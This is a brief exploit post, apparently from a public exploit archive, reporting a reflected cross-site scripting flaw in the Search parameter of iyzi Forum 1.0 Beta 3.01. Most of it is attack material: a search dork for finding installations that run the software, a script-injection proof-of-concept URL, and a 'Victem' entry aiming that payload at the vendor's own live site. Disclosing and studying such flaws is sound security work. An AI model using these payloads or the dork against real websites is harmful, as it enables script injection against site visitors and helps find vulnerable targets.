iyzi Forum version 1.0 Beta 3.01 suffers from a cross site scripting vulnerability.
3b43de58effe23e8622fad99327fe0e4e4ef3db163c6ee02ec5b2dd6abe10f8f
Credits : Pouya_Server
------------------------------------------------------------------------
Pouya.S3rver@Gmail.com
------------------------------------------------------------------------
>website : http://iyziforum.com
------------------------------------------------------------------------
>Download : http://www.iyziforum.com/files/iyziForumv1b3.01en.zip
------------------------------------------------------------------------
Version : 3.01
------------------------------------------------------------------------
Dork : "iyzi Forum v1.0 Beta 3.01"
------------------------------------------------------------------------
bug in : default.asp
------------------------------------------------------------------------
Exploit:
http://site.com/[Path]/community/default.asp?Search="><script>alert('Xss');</script>
------------------------------------------------------------------------
Victem :
http://www.iyziforum.com/community/default.asp?Search="><script>alert('Xss');</script>